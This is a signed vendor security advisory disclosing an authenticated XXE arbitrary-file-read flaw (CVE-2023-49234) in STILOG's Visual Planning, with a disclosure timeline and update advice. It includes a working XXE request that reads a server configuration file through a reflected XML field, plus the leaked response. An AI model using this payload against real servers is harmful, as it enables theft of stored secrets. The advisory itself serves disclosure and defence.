Authenticated attackers can exploit a weakness in the XML parser functionality of the Visual Planning application in order to obtain read access to arbitrary files on the application server. Depending on configured access permissions, this vulnerability could be used by an attacker to exfiltrate secrets stored on the local file system. All versions prior to Visual Planning 8 (Build 240207) are affected.
bdf19a1c93a8a216cff1545664827634a9baef8a83c8ebb7ba571f139ed08b7a
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Title
=====
SCHUTZWERK-SA-2023-006: Arbitrary File Read via XML External Entities in
Visual Planning
Status
======
PUBLISHED
Version
=======
1.0
CVE reference
=============
CVE-2023-49234
Link
====
https://www.schutzwerk.com/advisories/schutzwerk-sa-2023-006/
Text-only version:
https://www.schutzwerk.com/advisories/SCHUTZWERK-SA-2023-006.txt
Affected products/vendor
========================
All versions prior to Visual Planning 8 (Build 240207) by STILOG I.S.T.
Summary
=======
Authenticated attackers can exploit a weakness in the XML parser
functionality of the Visual Planning[0] application in order to obtain
read access to arbitrary files on the application server. Depending on
configured access permissions, this vulnerability could be used by an
attacker to exfiltrate secrets stored on the local file system.
Risk
====
An attacker can use the vulnerability to gather information and
depending on the stored data, exfiltrate secrets from the file system.
Furthermore, HTTP requests can be used for out-of-bands exfiltration and
possibly server side request forgery (SSRF) attacks.
Description
===========
During a recent red teaming assessment, Visual Planning was identified
as part of the customers internet-facing assets. The software is
developed by STILOG I.S.T. and provides resource management and
scheduling features. A security assessment conducted by SCHUTZWERK found
an arbitrary file read vulnerability via XML external entities in Visual
Planning.
The application Admin Center (vpadmin) communicates with the server
through an XML-based protocol that utilizes proprietary compression
methods and is transmitted via HTTP. SCHUTZWERK implemented a custom
proxy as part of an assessment in order to intercept and manipulate the
messages exchanged between application and server.
One of the messages sent by the Admin Center application after
authentication is the following:
<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>
</defaultValue>
<propertyName>PWD</propertyName>
<rawResult>false</rawResult>
<section>INSTALLDATA</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>
The method GetApplicationProperty is called to request the value of the
property PWD. The server responds with an XML message, where the value
element contains the response of the query:
<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>
In this response it was observed that if the requested property value
could not be resolved, the content of the request element defaultValue
will be reflected as part of the response, making it a suitable back
channel for XML external entity (XXE) injections.
The following message was sent to the Visual Planning application:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM
"C:\xampp2\tomcat\webapps\vplanning\configuration\install.properties"> ]>
<com.visualplanning.query.parameters.GetApplicationProperty>
<defaultValue>&example;</defaultValue>
<propertyName>ShowBackground</propertyName>
<rawResult>false</rawResult>
<section>Application</section>
<userSession isNull="true"/>
</com.visualplanning.query.parameters.GetApplicationProperty>
The server responds with the content of the requested install.properties
file inside the value element, thus confirming the XML parser is
vulnerable to XML external entity (XXE) injections:
<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.result.ApplicationPropertyResult>
<resultValues/>
<status>OK</status>
<value>#
#Tue Oct 03 15:37:33 CEST 2023
INSTALLDATA.INSTALLSERIAL=
INSTALLDATA.INSTALLURL=http\://127.0.0.1\:8080/vplanning
INSTALLDATA.OK=Next
INSTALLDATA.PAGE=PROVIDER
INSTALLDATA.POOLMODE=1
INSTALLDATA.PORT=3306
INSTALLDATA.PROVIDERTYPE=MySQL
INSTALLDATA.PWD=ENCODE\:
INSTALLDATA.SERVER=127.0.0.1
INSTALLDATA.SERVERLANG=de
INSTALLDATA.USER=root
INSTALLDATA.VIEWERSERIAL=
</value>
</com.visualplanning.query.result.ApplicationPropertyResult>
Further testing showed that out-of-bands exfiltration via HTTPS requests
is also generally possible.
Solution/Mitigation
===================
The vendor suggests to update to Visual Planning 8 (Build 240207)
Disclosure timeline
===================
2023-11-01: Vulnerability discovered
2023-11-09: Contact vendor in order to determine security contact
2023-11-10: Received generic sales response from vendor
2023-11-14: Contacted CTO of vendor directly
2023-11-16: Vulnerabilities demonstrated in call with contact at vendor
2023-11-24: CVE assigned by Mitre
2023-11-24: Additional technical details provided to vendor
2023-12-19: Vendor informed SCHUTZWERK that work on fixing the findings
is in progress
2024-01-30: Inquired about mitigation status regarding the reported
vulnerabilities
2024-01-30: Vendor informed SCHUTZWERK that some of the issues were
already fixed
2024-03-08: Sent advisory drafts to vendor
2024-03-28: Received patch information and release of advisory
Contact/Credits
===============
The vulnerability was discovered during an assessment by Lennert Preuth
and David Brown of SCHUTZWERK GmbH.
References
==========
[0] https://www.visual-planning.com/en/
Disclaimer
==========
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
most recent version of this security advisory can be found at SCHUTZWERK
GmbH's website ( https://www.schutzwerk.com ).
Additional information
======================
SCHUTZWERK Advisories: https://www.schutzwerk.com/blog/tags/advisories/
SCHUTZWERK Advisory Policy: https://www.schutzwerk.com/en/advisories/
-----BEGIN PGP SIGNATURE-----
iQJOBAEBCgA4FiEEgLsg7Oj/wY3LSF87GrXfkTIXLrsFAmYF0bcaHGFkdmlzb3Jp
ZXNAc2NodXR6d2Vyay5jb20ACgkQGrXfkTIXLrsdwA/+MyfbZTe36+AYi9q6GJE6
S75Xm2aZtEM3NC5F6aMcELqFEW7LNjERmBoqfkHe+SWfgFxeCXl/XelHaNnR7HTM
ZZPCGwJmOI+XaraInPVdCDw1QVIdiCG4VZzE0tlnFbLBgM+OTOxcDOoG7OhzP6mm
ALfankzxu3AfbZhwebQtSXIQ+YqjitTsvjQGPleylqYK5CJbChsyvmMjomu/GzdO
sWQ25ODCVUy6VORet8yn5OkQnM2CjSkteuTdNxCzd6JUB+vQ0g5FCE5NVzkqYq21
YJ4Fc3PgkyAnrGefSbueL+Z/K6btM8RysJAwGahIEOdlkG8W/p09L0QQUGERT2VN
UO6oTi/1OyoJBV9L5umr6aHss3P92ln90UAUW2dlZOdGSB8rlXisxLC1wtFZAXH9
YwiGY/ACXmV1FtQQpgFxfNRyEWaltU5S0Y0bPAaW+ABSMLlK4X0Ft9E/4s4Yel2d
TGngEnVKcR/PKNtrJbBqPDwt98R0MdQi0QxBRaxGxAg4Yr1qex8ph6IRT7bDTm0/
1CKlQL7y9uvXlnFE4CO3IkKNp0ejKn3A7QEep4jit07VItIc+sRsoMnB6v54DoML
ZfIisDoijb3doTNieyMpgTGZTDWLwLO36IS9JiqafNCAnngExqylFX6vYQVggtRz
mZ2yA2/9ZfQwOawEirQtQr8=
=TUGM
-----END PGP SIGNATURE-----
--
SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany
Zertifiziert / Certified ISO 27001, 9001 and TISAX
Phone +49 731 977 191 0
advisories@schutzwerk.com / www.schutzwerk.com
Geschäftsführer / Managing Directors:
Jakob Pietzka, Michael Schäfer
Amtsgericht Ulm / HRB 727391
Datenschutz / Data Protection www.schutzwerk.com/datenschutz